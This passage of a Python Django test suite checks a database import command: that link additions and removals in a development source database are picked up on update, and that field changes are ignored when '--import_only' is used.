    self.assertTrue(encoded_value.modified > previous_modified)
# M2M link updates.
def test_update_added_harmonized_trait_set_version_update_reasons(self):
    """A new reason link to an existing harmonized_trait_set_version is imported after an update."""
    # Run the initial db import.
    management.call_command('import_db', '--devel_db', '--no_backup',
                            '--taggedtrait_creator={}'.format(self.user.email))
    # Pick an allowed reason to create a new link to in the source db.
    reason = models.AllowedUpdateReason.objects.get(pk=1)
    # Find a harmonized_trait_set_version that this reason isn't linked to yet.
    linked_hts_versions = reason.harmonizedtraitsetversion_set.all()
    possible_hts_versions = models.HarmonizedTraitSetVersion.objects.all()
    unlinked_hts_versions = set(possible_hts_versions) - set(linked_hts_versions)
    # Guard against a devel db state where the reason is already linked everywhere;
    # the test cannot add a new link in that case.
    if len(unlinked_hts_versions) < 1:
        raise ValueError('The allowed update reason is already linked to all possible datasets.')
    hts_version_to_link = list(unlinked_hts_versions)[0]
    # Create a new hts_version-allowed_reason link in the source db.
    # Reopen the devel db with full (write) permissions first.
    self.cursor.close()
    self.source_db.close()
    self.source_db = get_devel_db(permissions='full')
    self.cursor = self.source_db.cursor(buffered=True, dictionary=True)
    add_reason_link_query = """INSERT INTO harmonized_trait_set_version_update_reason (reason_id,
                               harmonized_trait_set_version_id, date_added)
                               VALUES ({}, {}, '{}');""".format(
        reason.pk, hts_version_to_link.i_id, timezone.now().strftime('%Y-%m-%d %H:%M:%S'))
    self.cursor.execute(add_reason_link_query)
    self.source_db.commit()
    self.cursor.close()
    self.source_db.close()
    # Now run the update commands.
    management.call_command('import_db', '--devel_db', '--update_only', '--verbosity=0', '--no_backup',
                            '--taggedtrait_creator={}'.format(self.user.email))
    # Check that the chosen reason is now linked to the hts_version that was picked, in the Django db,
    # from both directions of the M2M relation.
    reason.refresh_from_db()
    hts_version_to_link.refresh_from_db()
    self.assertTrue(hts_version_to_link in reason.harmonizedtraitsetversion_set.all())
    self.assertTrue(reason in hts_version_to_link.update_reasons.all())
def test_update_removed_harmonized_trait_set_version_update_reasons(self):
    """A harmonized_trait_set_version - reason link that is no longer in the source db is removed after update."""
    # Run the initial db import.
    management.call_command('import_db', '--devel_db', '--no_backup',
                            '--taggedtrait_creator={}'.format(self.user.email))
    # Pick a random hts_version (with i_version=2) and one of its linked reasons
    # to remove the link for in the source db.
    hts_version_to_unlink = models.HarmonizedTraitSetVersion.objects.filter(i_version=2).order_by('?').first()
    reason_to_unlink = hts_version_to_unlink.update_reasons.all().order_by('?').first()
    # Remove the link in the source db.
    # Reopen the devel db with full (write) permissions first.
    self.cursor.close()
    self.source_db.close()
    self.source_db = get_devel_db(permissions='full')
    self.cursor = self.source_db.cursor(buffered=True, dictionary=True)
    remove_reason_link_query = """DELETE FROM harmonized_trait_set_version_update_reason WHERE
                                  harmonized_trait_set_version_id={} AND
                                  reason_id={}""".format(hts_version_to_unlink.pk, reason_to_unlink.pk)
    self.cursor.execute(remove_reason_link_query)
    self.source_db.commit()
    self.cursor.close()
    self.source_db.close()
    # Now run the update commands.
    management.call_command('import_db', '--devel_db', '--update_only', '--verbosity=0', '--no_backup',
                            '--taggedtrait_creator={}'.format(self.user.email))
    # Check that the chosen reason is not linked to the hts_version now, in the Django db,
    # from both directions of the M2M relation.
    reason_to_unlink.refresh_from_db()
    hts_version_to_unlink.refresh_from_db()
    self.assertFalse(hts_version_to_unlink in reason_to_unlink.harmonizedtraitsetversion_set.all())
    self.assertFalse(reason_to_unlink in hts_version_to_unlink.update_reasons.all())
def test_update_add_component_source_traits(self):
    """A new component source trait link to an existing harmonized trait is imported."""
    # Run the initial db import.
    management.call_command('import_db', '--devel_db', '--no_backup',
                            '--taggedtrait_creator={}'.format(self.user.email))
    # Pick a source trait to create a new link to in the source db.
    source_trait = models.SourceTrait.objects.get(pk=1)
    # Find a harmonization_unit which this source trait isn't linked to already.
    hunit_to_link = models.HarmonizationUnit.objects.exclude(
        i_id__in=models.HarmonizationUnit.objects.filter(component_source_traits__in=[source_trait]))[0]
    # Find a harmonized trait from within this harmonization unit.
    htrait_to_link = hunit_to_link.harmonizedtrait_set.all()[0]
    # Prep for altering the devel db with full (write) permissions.
    self.source_db = get_devel_db(permissions='full')
    self.cursor = self.source_db.cursor(buffered=True, dictionary=True)
    # Add source_trait as a component trait of harmonization unit and harmonized trait in the source db.
    # Use a parameterized query rather than string formatting so values are quoted correctly.
    add_component_trait_query = ("INSERT INTO component_source_trait (harmonized_trait_id, "
                                 "harmonization_unit_id, component_trait_id, date_added) "
                                 "VALUES (%s, %s, %s, %s)")
    self.cursor.execute(add_component_trait_query,
                        (htrait_to_link.i_trait_id, hunit_to_link.i_id, source_trait.i_trait_id,
                         timezone.now().strftime('%Y-%m-%d %H:%M:%S')))
    self.source_db.commit()
    # Close the db connection.
    self.cursor.close()
    self.source_db.close()
    # Now run the update commands.
    management.call_command('import_db', '--devel_db', '--update_only', '--verbosity=0', '--no_backup',
                            '--taggedtrait_creator={}'.format(self.user.email))
    # Check that the chosen source trait is now linked to the correct harmonization unit and harmonized trait.
    source_trait.refresh_from_db()
    htrait_to_link.refresh_from_db()
    hunit_to_link.refresh_from_db()
    self.assertTrue(htrait_to_link in source_trait.source_component_of_harmonized_trait.all())
    self.assertTrue(hunit_to_link in source_trait.source_component_of_harmonization_unit.all())
def test_update_remove_component_source_traits(self):
    """A deleted component source trait link is removed."""
    # Run the initial db import.
    management.call_command('import_db', '--devel_db', '--no_backup',
                            '--taggedtrait_creator={}'.format(self.user.email))
    # Pick a random unit/trait/component combination to remove the link for in the source db.
    hunit_to_unlink = models.HarmonizationUnit.objects.exclude(component_source_traits=None).order_by('?').first()
    htrait_to_unlink = hunit_to_unlink.harmonizedtrait_set.all().order_by('?').first()
    component_source_trait = hunit_to_unlink.component_source_traits.all().order_by('?').first()
    # Open source db with full (write) privileges.
    self.source_db = get_devel_db(permissions='full')
    self.cursor = self.source_db.cursor(buffered=True, dictionary=True)
    # Remove a component source trait link.
    remove_component_trait_query = """DELETE FROM component_source_trait WHERE harmonized_trait_id={} AND
                                      harmonization_unit_id={} AND component_trait_id={}""".format(
        htrait_to_unlink.pk, hunit_to_unlink.pk, component_source_trait.pk)
    self.cursor.execute(remove_component_trait_query)
    self.source_db.commit()
    # Close the db connection.
    self.cursor.close()
    self.source_db.close()
    # Now run the update commands.
    management.call_command('import_db', '--devel_db', '--update_only', '--verbosity=0', '--no_backup',
                            '--taggedtrait_creator={}'.format(self.user.email))
    # Check that the link between these two models is now gone, from both directions.
    component_source_trait.refresh_from_db()
    htrait_to_unlink.refresh_from_db()
    hunit_to_unlink.refresh_from_db()
    self.assertFalse(htrait_to_unlink in component_source_trait.source_component_of_harmonized_trait.all())
    self.assertFalse(hunit_to_unlink in component_source_trait.source_component_of_harmonization_unit.all())
def test_update_add_component_batch_traits(self):
    """A new component batch trait link to an existing harmonized trait is imported."""
    # Run the initial db import.
    management.call_command('import_db', '--devel_db', '--no_backup',
                            '--taggedtrait_creator={}'.format(self.user.email))
    # Pick a source trait to create a new link to in the source db.
    source_trait = models.SourceTrait.objects.get(pk=1)
    # Find a harmonization_unit which this source trait isn't linked to already.
    hunit_to_link = models.HarmonizationUnit.objects.exclude(
        i_id__in=models.HarmonizationUnit.objects.filter(component_batch_traits__in=[source_trait]))[0]
    # Find a harmonized trait from within this harmonization unit.
    # NOTE(review): this traverses harmonized_trait_set_version, unlike the
    # component-source-trait test which uses hunit_to_link.harmonizedtrait_set
    # directly — presumably equivalent; confirm against the model definitions.
    htrait_to_link = hunit_to_link.harmonized_trait_set_version.harmonizedtrait_set.all()[0]
    # Prep for altering the devel db with full (write) permissions.
    self.source_db = get_devel_db(permissions='full')
    self.cursor = self.source_db.cursor(buffered=True, dictionary=True)
    # Add source_trait as a component batch trait of harmonization unit and harmonized trait in the source db.
    # Use a parameterized query rather than string formatting so values are quoted correctly.
    add_component_trait_query = ("INSERT INTO component_batch_trait (harmonized_trait_id, "
                                 "harmonization_unit_id, component_trait_id, date_added) "
                                 "VALUES (%s, %s, %s, %s)")
    self.cursor.execute(add_component_trait_query,
                        (htrait_to_link.i_trait_id, hunit_to_link.i_id, source_trait.i_trait_id,
                         timezone.now().strftime('%Y-%m-%d %H:%M:%S')))
    self.source_db.commit()
    # Close the db connection.
    self.cursor.close()
    self.source_db.close()
    # Now run the update commands.
    management.call_command('import_db', '--devel_db', '--update_only', '--verbosity=0', '--no_backup',
                            '--taggedtrait_creator={}'.format(self.user.email))
    # Check that the chosen source trait is now linked to the correct harmonization unit and harmonized trait.
    source_trait.refresh_from_db()
    htrait_to_link.refresh_from_db()
    hunit_to_link.refresh_from_db()
    self.assertTrue(htrait_to_link in source_trait.batch_component_of_harmonized_trait.all())
    self.assertTrue(hunit_to_link in source_trait.batch_component_of_harmonization_unit.all())
def test_update_remove_component_batch_traits(self):
    """A deleted component batch trait link is removed."""
    # Run the initial db import.
    management.call_command('import_db', '--devel_db', '--no_backup',
                            '--taggedtrait_creator={}'.format(self.user.email))
    # Pick a random unit/trait/component combination to remove the link for in the source db.
    hunit_to_unlink = models.HarmonizationUnit.objects.exclude(component_batch_traits=None).order_by('?').first()
    htrait_to_unlink = hunit_to_unlink.harmonizedtrait_set.all().order_by('?').first()
    component_batch_trait = hunit_to_unlink.component_batch_traits.all().order_by('?').first()
    # Open source db with full (write) privileges.
    self.source_db = get_devel_db(permissions='full')
    self.cursor = self.source_db.cursor(buffered=True, dictionary=True)
    # Remove a component batch trait link.
    remove_component_trait_query = """DELETE FROM component_batch_trait WHERE harmonized_trait_id={} AND
                                      harmonization_unit_id={} AND component_trait_id={}""".format(
        htrait_to_unlink.pk, hunit_to_unlink.pk, component_batch_trait.pk)
    self.cursor.execute(remove_component_trait_query)
    self.source_db.commit()
    # Close the db connection.
    self.cursor.close()
    self.source_db.close()
    # Now run the update commands.
    management.call_command('import_db', '--devel_db', '--update_only', '--verbosity=0', '--no_backup',
                            '--taggedtrait_creator={}'.format(self.user.email))
    # Check that the link between these two models is now gone, from both directions.
    component_batch_trait.refresh_from_db()
    htrait_to_unlink.refresh_from_db()
    hunit_to_unlink.refresh_from_db()
    self.assertFalse(htrait_to_unlink in component_batch_trait.batch_component_of_harmonized_trait.all())
    self.assertFalse(hunit_to_unlink in component_batch_trait.batch_component_of_harmonization_unit.all())
def test_update_add_component_age_traits(self):
    """A new component age trait link to an existing harmonization unit is imported."""
    # Run the initial db import.
    management.call_command('import_db', '--devel_db', '--no_backup',
                            '--taggedtrait_creator={}'.format(self.user.email))
    # Pick a source trait to create a new link to in the source db.
    source_trait = models.SourceTrait.objects.get(pk=1)
    # Find a harmonization_unit which this source trait isn't linked to already.
    hunit_to_link = models.HarmonizationUnit.objects.exclude(
        i_id__in=models.HarmonizationUnit.objects.filter(component_age_traits__in=[source_trait]))[0]
    # Prep for altering the devel db with full (write) permissions.
    self.source_db = get_devel_db(permissions='full')
    self.cursor = self.source_db.cursor(buffered=True, dictionary=True)
    # Add source_trait as a component age trait of the harmonization unit in the source db.
    # Use a parameterized query rather than string formatting so values are quoted correctly.
    add_component_trait_query = ("INSERT INTO component_age_trait (harmonization_unit_id, "
                                 "component_trait_id, date_added) VALUES (%s, %s, %s)")
    self.cursor.execute(add_component_trait_query,
                        (hunit_to_link.i_id, source_trait.i_trait_id,
                         timezone.now().strftime('%Y-%m-%d %H:%M:%S')))
    self.source_db.commit()
    # Close the db connection.
    self.cursor.close()
    self.source_db.close()
    # Now run the update commands.
    management.call_command('import_db', '--devel_db', '--update_only', '--verbosity=0', '--no_backup',
                            '--taggedtrait_creator={}'.format(self.user.email))
    # Check that the chosen source trait is now linked to the correct harmonization unit.
    source_trait.refresh_from_db()
    hunit_to_link.refresh_from_db()
    self.assertTrue(hunit_to_link in source_trait.age_component_of_harmonization_unit.all())
def test_update_remove_component_age_traits(self):
    """A deleted component age trait link is removed."""
    # Run the initial db import.
    management.call_command('import_db', '--devel_db', '--no_backup',
                            '--taggedtrait_creator={}'.format(self.user.email))
    # Pick a random unit/component combination to remove the link for in the source db.
    hunit_to_unlink = models.HarmonizationUnit.objects.exclude(component_age_traits=None).order_by('?').first()
    component_age_trait = hunit_to_unlink.component_age_traits.all().order_by('?').first()
    # Open source db with full (write) privileges.
    self.source_db = get_devel_db(permissions='full')
    self.cursor = self.source_db.cursor(buffered=True, dictionary=True)
    # Remove a component age trait link.
    remove_component_trait_query = """DELETE FROM component_age_trait WHERE harmonization_unit_id={} AND
                                      component_trait_id={}""".format(
        hunit_to_unlink.pk, component_age_trait.pk)
    self.cursor.execute(remove_component_trait_query)
    self.source_db.commit()
    # Close the db connection.
    self.cursor.close()
    self.source_db.close()
    # Now run the update commands.
    management.call_command('import_db', '--devel_db', '--update_only', '--verbosity=0', '--no_backup',
                            '--taggedtrait_creator={}'.format(self.user.email))
    # Check that the link between these two models is now gone.
    component_age_trait.refresh_from_db()
    hunit_to_unlink.refresh_from_db()
    self.assertFalse(hunit_to_unlink in component_age_trait.age_component_of_harmonization_unit.all())
def test_update_add_component_harmonized_trait_set_versions(self):
    """New component harmonized trait links to existing harmonized trait and harmonization unit are imported."""
    # Run the initial db import.
    management.call_command('import_db', '--devel_db', '--no_backup',
                            '--taggedtrait_creator={}'.format(self.user.email))
    # Pick a harmonized trait set version to create a new link to in the source db.
    harmonized_trait_set_version = models.HarmonizedTraitSetVersion.objects.get(pk=1)
    # Find a harmonization_unit which this harmonized trait set version isn't linked to already.
    hunit_to_link = models.HarmonizationUnit.objects.exclude(
        i_id__in=models.HarmonizationUnit.objects.filter(
            component_harmonized_trait_set_versions__in=[harmonized_trait_set_version]))[0]
    # Find a harmonized trait from within this harmonization unit.
    htrait_to_link = hunit_to_link.harmonizedtrait_set.all()[0]
    # Prep for altering the devel db with full (write) permissions.
    self.source_db = get_devel_db(permissions='full')
    self.cursor = self.source_db.cursor(buffered=True, dictionary=True)
    # Add the trait set version as a component of harmonization unit and harmonized trait in the source db.
    # Use a parameterized query rather than string formatting so values are quoted correctly.
    add_component_trait_query = ("INSERT INTO component_harmonized_trait_set (harmonized_trait_id, "
                                 "harmonization_unit_id, component_trait_set_version_id, date_added) "
                                 "VALUES (%s, %s, %s, %s)")
    self.cursor.execute(add_component_trait_query,
                        (htrait_to_link.i_trait_id, hunit_to_link.i_id, harmonized_trait_set_version.i_id,
                         timezone.now().strftime('%Y-%m-%d %H:%M:%S')))
    self.source_db.commit()
    # Close the db connection.
    self.cursor.close()
    self.source_db.close()
    # Now run the update commands.
    management.call_command('import_db', '--devel_db', '--update_only', '--verbosity=0', '--no_backup',
                            '--taggedtrait_creator={}'.format(self.user.email))
    # Check that the chosen trait set version is now linked to the correct harmonization unit and harmonized trait.
    harmonized_trait_set_version.refresh_from_db()
    htrait_to_link.refresh_from_db()
    hunit_to_link.refresh_from_db()
    self.assertTrue(htrait_to_link in harmonized_trait_set_version.harmonized_component_of_harmonized_trait.all())
    self.assertTrue(hunit_to_link in harmonized_trait_set_version.harmonized_component_of_harmonization_unit.all())
def test_update_remove_component_harmonized_trait_set_versions(self):
    """Deleted component harmonized trait links to a harmonized trait and a harmonization unit are removed."""
    # Run the initial db import.
    management.call_command('import_db', '--devel_db', '--no_backup',
                            '--taggedtrait_creator={}'.format(self.user.email))
    # Pick a random unit/trait/component combination to remove the link for in the source db.
    hunit_to_unlink = models.HarmonizationUnit.objects.exclude(
        component_harmonized_trait_set_versions=None).order_by('?').first()
    htrait_to_unlink = hunit_to_unlink.harmonizedtrait_set.all().order_by('?').first()
    component_harmonized_trait_set_version = hunit_to_unlink.component_harmonized_trait_set_versions.all().order_by('?').first()  # noqa: E501
    # Open source db with full (write) privileges.
    self.source_db = get_devel_db(permissions='full')
    self.cursor = self.source_db.cursor(buffered=True, dictionary=True)
    # Remove a component harmonized trait set version link.
    remove_component_trait_query = """DELETE FROM component_harmonized_trait_set WHERE harmonized_trait_id={} AND
                                      harmonization_unit_id={} AND component_trait_set_version_id={}""".format(
        htrait_to_unlink.pk, hunit_to_unlink.pk, component_harmonized_trait_set_version.pk)
    self.cursor.execute(remove_component_trait_query)
    self.source_db.commit()
    # Close the db connection.
    self.cursor.close()
    self.source_db.close()
    # Now run the update commands.
    management.call_command('import_db', '--devel_db', '--update_only', '--verbosity=0', '--no_backup',
                            '--taggedtrait_creator={}'.format(self.user.email))
    # Check that the link between these two models is now gone, from both directions.
    component_harmonized_trait_set_version.refresh_from_db()
    htrait_to_unlink.refresh_from_db()
    hunit_to_unlink.refresh_from_db()
    self.assertFalse(
        htrait_to_unlink in component_harmonized_trait_set_version.harmonized_component_of_harmonized_trait.all())
    self.assertFalse(
        hunit_to_unlink in component_harmonized_trait_set_version.harmonized_component_of_harmonization_unit.all())
class ImportNoUpdateTest(BaseTestDataTestCase):
"""Tests that updated source data is NOT imported when the --import_only flag is used."""
@classmethod
def setUpClass(cls):
    """Create a user."""
    super().setUpClass()
    # A user is needed because the tests pass its email address to
    # import_db's --taggedtrait_creator option.
    cls.user = UserFactory.create()
# Source trait updates.
def test_no_update_global_study(self):
    """Updates in global_study are NOT imported when --import_only is used."""
    management.call_command('import_db', '--devel_db', '--no_backup',
                            '--taggedtrait_creator={}'.format(self.user.email))
    # Close the db connections because change_data_in_table() opens new connections.
    # This does not affect the .cursor and .source_db attributes in other functions.
    self.cursor.close()
    self.source_db.close()
    model = models.GlobalStudy
    model_instance = model.objects.all()[0]
    old_mod_time = model_instance.modified
    source_db_table_name = 'global_study'
    field_to_update = 'name'
    new_value = 'asdfghjkl'
    source_db_pk_name = model_instance._meta.pk.name.replace('i_', '')
    # Sleep so that a re-imported modified timestamp would be detectably later.
    sleep(1)
    change_data_in_table(source_db_table_name, field_to_update, new_value, source_db_pk_name, model_instance.pk)
    management.call_command('import_db', '--devel_db', '--import_only', '--verbosity=0', '--no_backup',
                            '--taggedtrait_creator={}'.format(self.user.email))
    model_instance.refresh_from_db()
    # With --import_only, the changed value must NOT be imported and the
    # modified timestamp must NOT advance.
    self.assertNotEqual(new_value, getattr(model_instance, 'i_' + field_to_update))
    self.assertFalse(model_instance.modified > old_mod_time)
def test_no_update_study(self):
    """Updates in study are NOT imported when --import_only is used."""
    management.call_command('import_db', '--devel_db', '--no_backup',
                            '--taggedtrait_creator={}'.format(self.user.email))
    # Close the db connections because change_data_in_table() opens new connections.
    # This does not affect the .cursor and .source_db attributes in other functions.
    self.cursor.close()
    self.source_db.close()
    model = models.Study
    model_instance = model.objects.all()[0]
    old_mod_time = model_instance.modified
    source_db_table_name = 'study'
    field_to_update = 'study_name'
    new_value = 'asdfghjkl'
    source_db_pk_name = model_instance._meta.pk.name.replace('i_', '')
    # Sleep so that a re-imported modified timestamp would be detectably later.
    sleep(1)
    change_data_in_table(source_db_table_name, field_to_update, new_value, source_db_pk_name, model_instance.pk)
    management.call_command('import_db', '--devel_db', '--import_only', '--verbosity=0', '--no_backup',
                            '--taggedtrait_creator={}'.format(self.user.email))
    model_instance.refresh_from_db()
    # With --import_only, the changed value must NOT be imported and the
    # modified timestamp must NOT advance.
    self.assertNotEqual(new_value, getattr(model_instance, 'i_' + field_to_update))
    self.assertFalse(model_instance.modified > old_mod_time)
    def test_no_update_source_study_version(self):
        """Updates in source_study_version are NOT imported."""
        management.call_command('import_db', '--devel_db', '--no_backup',
                                '--taggedtrait_creator={}'.format(self.user.email))
        # Close the db connections because change_data_in_table() opens new connections.
        # This does not affect the .cursor and .source_db attributes in other functions.
        self.cursor.close()
        self.source_db.close()
        model = models.SourceStudyVersion
        model_instance = model.objects.all()[0]
        old_mod_time = model_instance.modified
        source_db_table_name = 'source_study_version'
        field_to_update = 'is_deprecated'
        # Flip the current boolean value; stored as an int in the source db.
        new_value = int(not getattr(model_instance, 'i_' + field_to_update))
        # Source db pk column name is the Django pk field name without the 'i_' prefix.
        source_db_pk_name = model_instance._meta.pk.name.replace('i_', '')
        # Sleep so a (spurious) imported update would have a detectably later modified time.
        sleep(1)
        change_data_in_table(source_db_table_name, field_to_update, new_value, source_db_pk_name, model_instance.pk)
        management.call_command('import_db', '--devel_db', '--import_only', '--verbosity=0', '--no_backup',
                                '--taggedtrait_creator={}'.format(self.user.email))
        model_instance.refresh_from_db()
        # Check that the field was NOT updated to the new value and the modified time is unchanged.
        self.assertNotEqual(new_value, getattr(model_instance, 'i_' + field_to_update))
        self.assertFalse(model_instance.modified > old_mod_time)
    def test_no_update_source_dataset(self):
        """Updates in source_dataset table are NOT imported."""
        management.call_command('import_db', '--devel_db', '--no_backup',
                                '--taggedtrait_creator={}'.format(self.user.email))
        # Close the db connections because change_data_in_table() opens new connections.
        # This does not affect the .cursor and .source_db attributes in other functions.
        self.cursor.close()
        self.source_db.close()
        model = models.SourceDataset
        model_instance = model.objects.all()[0]
        old_mod_time = model_instance.modified
        source_db_table_name = 'source_dataset'
        field_to_update = 'dbgap_description'
        new_value = 'asdgsdfg'
        # Source db pk column name is the Django pk field name without the 'i_' prefix.
        source_db_pk_name = model_instance._meta.pk.name.replace('i_', '')
        # Sleep so a (spurious) imported update would have a detectably later modified time.
        sleep(1)
        change_data_in_table(source_db_table_name, field_to_update, new_value, source_db_pk_name, model_instance.pk)
        management.call_command('import_db', '--devel_db', '--import_only', '--verbosity=0', '--no_backup',
                                '--taggedtrait_creator={}'.format(self.user.email))
        model_instance.refresh_from_db()
        # Check that the field was NOT updated to the new value and the modified time is unchanged.
        self.assertNotEqual(new_value, getattr(model_instance, 'i_' + field_to_update))
        self.assertFalse(model_instance.modified > old_mod_time)
    def test_no_update_subcohort(self):
        """Updates in subcohort are NOT imported."""
        management.call_command('import_db', '--devel_db', '--no_backup',
                                '--taggedtrait_creator={}'.format(self.user.email))
        # Close the db connections because change_data_in_table() opens new connections.
        # This does not affect the .cursor and .source_db attributes in other functions.
        self.cursor.close()
        self.source_db.close()
        model = models.Subcohort
        model_instance = model.objects.all()[0]
        old_mod_time = model_instance.modified
        source_db_table_name = 'subcohort'
        field_to_update = 'name'
        new_value = 'asdfghjkl'
        # Source db pk column name is the Django pk field name without the 'i_' prefix.
        source_db_pk_name = model_instance._meta.pk.name.replace('i_', '')
        # Sleep so a (spurious) imported update would have a detectably later modified time.
        sleep(1)
        change_data_in_table(source_db_table_name, field_to_update, new_value, source_db_pk_name, model_instance.pk)
        management.call_command('import_db', '--devel_db', '--import_only', '--verbosity=0', '--no_backup',
                                '--taggedtrait_creator={}'.format(self.user.email))
        model_instance.refresh_from_db()
        # Check that the field was NOT updated to the new value and the modified time is unchanged.
        self.assertNotEqual(new_value, getattr(model_instance, 'i_' + field_to_update))
        self.assertFalse(model_instance.modified > old_mod_time)
    def test_no_update_source_trait(self):
        """Updates in source_trait table are NOT imported."""
        management.call_command('import_db', '--devel_db', '--no_backup',
                                '--taggedtrait_creator={}'.format(self.user.email))
        # Close the db connections because change_data_in_table() opens new connections.
        # This does not affect the .cursor and .source_db attributes in other functions.
        self.cursor.close()
        self.source_db.close()
        model = models.SourceTrait
        model_instance = model.objects.all()[0]
        old_mod_time = model_instance.modified
        source_db_table_name = 'source_trait'
        field_to_update = 'dbgap_comment'
        new_value = 'asdfghjkl'
        # This table's pk column name doesn't follow the i_-prefix pattern, so spell it out.
        source_db_pk_name = 'source_trait_id'
        # Sleep so a (spurious) imported update would have a detectably later modified time.
        sleep(1)
        change_data_in_table(source_db_table_name, field_to_update, new_value, source_db_pk_name, model_instance.pk)
        management.call_command('import_db', '--devel_db', '--import_only', '--verbosity=0', '--no_backup',
                                '--taggedtrait_creator={}'.format(self.user.email))
        model_instance.refresh_from_db()
        # Check that the field was NOT updated to the new value and the modified time is unchanged.
        self.assertNotEqual(new_value, getattr(model_instance, 'i_' + field_to_update))
        self.assertFalse(model_instance.modified > old_mod_time)
    def test_no_update_source_trait_encoded_value(self):
        """Updates in source_trait_encoded_values are NOT imported."""
        management.call_command('import_db', '--devel_db', '--no_backup',
                                '--taggedtrait_creator={}'.format(self.user.email))
        # Close the db connections because change_data_in_table() opens new connections.
        # This does not affect the .cursor and .source_db attributes in other functions.
        self.cursor.close()
        self.source_db.close()
        model = models.SourceTraitEncodedValue
        model_instance = model.objects.all()[0]
        old_mod_time = model_instance.modified
        source_db_table_name = 'source_trait_encoded_values'
        field_to_update = 'value'
        new_value = 'asdfghjkl'
        # Source db pk column name is the Django pk field name without the 'i_' prefix.
        source_db_pk_name = model_instance._meta.pk.name.replace('i_', '')
        # Sleep so a (spurious) imported update would have a detectably later modified time.
        sleep(1)
        change_data_in_table(source_db_table_name, field_to_update, new_value, source_db_pk_name, model_instance.pk)
        management.call_command('import_db', '--devel_db', '--import_only', '--verbosity=0', '--no_backup',
                                '--taggedtrait_creator={}'.format(self.user.email))
        model_instance.refresh_from_db()
        # Check that the field was NOT updated to the new value and the modified time is unchanged.
        self.assertNotEqual(new_value, getattr(model_instance, 'i_' + field_to_update))
        self.assertFalse(model_instance.modified > old_mod_time)
# Harmonized trait updates.
    def test_no_update_harmonized_trait_set(self):
        """Updates to harmonized_trait_set are NOT imported."""
        management.call_command('import_db', '--devel_db', '--no_backup',
                                '--taggedtrait_creator={}'.format(self.user.email))
        # Close the db connections because change_data_in_table() opens new connections.
        # This does not affect the .cursor and .source_db attributes in other functions.
        self.cursor.close()
        self.source_db.close()
        model = models.HarmonizedTraitSet
        model_instance = model.objects.all()[0]
        old_mod_time = model_instance.modified
        source_db_table_name = 'harmonized_trait_set'
        field_to_update = 'trait_set_name'
        new_value = 'asdfghjkl'
        # Source db pk column name is the Django pk field name without the 'i_' prefix.
        source_db_pk_name = model_instance._meta.pk.name.replace('i_', '')
        # Sleep so a (spurious) imported update would have a detectably later modified time.
        sleep(1)
        change_data_in_table(source_db_table_name, field_to_update, new_value, source_db_pk_name, model_instance.pk)
        management.call_command('import_db', '--devel_db', '--import_only', '--verbosity=0', '--no_backup',
                                '--taggedtrait_creator={}'.format(self.user.email))
        model_instance.refresh_from_db()
        # Check that the field was NOT updated to the new value and the modified time is unchanged.
        self.assertNotEqual(new_value, getattr(model_instance, 'i_' + field_to_update))
        self.assertFalse(model_instance.modified > old_mod_time)
    def test_no_update_harmonized_trait_set_version(self):
        """Updates to harmonized_trait_set_version are NOT imported."""
        management.call_command('import_db', '--devel_db', '--no_backup',
                                '--taggedtrait_creator={}'.format(self.user.email))
        # Close the db connections because change_data_in_table() opens new connections.
        # This does not affect the .cursor and .source_db attributes in other functions.
        self.cursor.close()
        self.source_db.close()
        model = models.HarmonizedTraitSetVersion
        model_instance = model.objects.all()[0]
        old_mod_time = model_instance.modified
        source_db_table_name = 'harmonized_trait_set_version'
        field_to_update = 'harmonized_by'
        new_value = 'asdfghjkl'
        # Source db pk column name is the Django pk field name without the 'i_' prefix.
        source_db_pk_name = model_instance._meta.pk.name.replace('i_', '')
        # Sleep so a (spurious) imported update would have a detectably later modified time.
        sleep(1)
        change_data_in_table(source_db_table_name, field_to_update, new_value, source_db_pk_name, model_instance.pk)
        management.call_command('import_db', '--devel_db', '--import_only', '--verbosity=0', '--no_backup',
                                '--taggedtrait_creator={}'.format(self.user.email))
        model_instance.refresh_from_db()
        # Check that the field was NOT updated to the new value and the modified time is unchanged.
        self.assertNotEqual(new_value, getattr(model_instance, 'i_' + field_to_update))
        self.assertFalse(model_instance.modified > old_mod_time)
    def test_no_update_allowed_update_reason(self):
        """Updates to allowed_update_reason are NOT imported."""
        management.call_command('import_db', '--devel_db', '--no_backup',
                                '--taggedtrait_creator={}'.format(self.user.email))
        # Close the db connections because change_data_in_table() opens new connections.
        # This does not affect the .cursor and .source_db attributes in other functions.
        self.cursor.close()
        self.source_db.close()
        model = models.AllowedUpdateReason
        model_instance = model.objects.all()[0]
        source_db_table_name = 'allowed_update_reason'
        field_to_update = 'description'
        new_value = 'asdfghjkl'
        # Source db pk column name is the Django pk field name without the 'i_' prefix.
        source_db_pk_name = model_instance._meta.pk.name.replace('i_', '')
        # Sleep so any timestamp-based change detection sees a distinct time for the edit.
        sleep(1)
        change_data_in_table(source_db_table_name, field_to_update, new_value, source_db_pk_name, model_instance.pk)
        management.call_command('import_db', '--devel_db', '--import_only', '--verbosity=0', '--no_backup',
                                '--taggedtrait_creator={}'.format(self.user.email))
        model_instance.refresh_from_db()
        # There should NOT be any imported updates.
        self.assertNotEqual(new_value, getattr(model_instance, 'i_' + field_to_update))
    def test_no_update_harmonization_unit(self):
        """Updates to harmonization_unit are NOT imported."""
        management.call_command('import_db', '--devel_db', '--no_backup',
                                '--taggedtrait_creator={}'.format(self.user.email))
        # Close the db connections because change_data_in_table() opens new connections.
        # This does not affect the .cursor and .source_db attributes in other functions.
        self.cursor.close()
        self.source_db.close()
        model = models.HarmonizationUnit
        model_instance = model.objects.all()[0]
        old_mod_time = model_instance.modified
        source_db_table_name = 'harmonization_unit'
        # This table's pk column is plain 'id' in the source db.
        source_db_pk_name = 'id'
        field_to_update = 'tag'
        new_value = 'asdfghjkl'
        # Sleep so a (spurious) imported update would have a detectably later modified time.
        sleep(1)
        change_data_in_table(source_db_table_name, field_to_update, new_value, source_db_pk_name, model_instance.pk)
        management.call_command('import_db', '--devel_db', '--import_only', '--verbosity=0', '--no_backup',
                                '--taggedtrait_creator={}'.format(self.user.email))
        model_instance.refresh_from_db()
        # Check that the field was NOT updated to the new value and the modified time is unchanged.
        self.assertNotEqual(new_value, getattr(model_instance, 'i_' + field_to_update))
        self.assertFalse(model_instance.modified > old_mod_time)
def test_no_update_harmonized_trait(self):
"""Updates to harmonized_trait are imported."""
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Close the db connections because change_data_in_table() opens new connections.
# This does not affect the .cursor and .source_db attributes in other functions.
self.cursor.close()
self.source_db.close()
model = models.HarmonizedTrait
model_instance = model.objects.all()[0]
old_mod_time = model_instance.modified
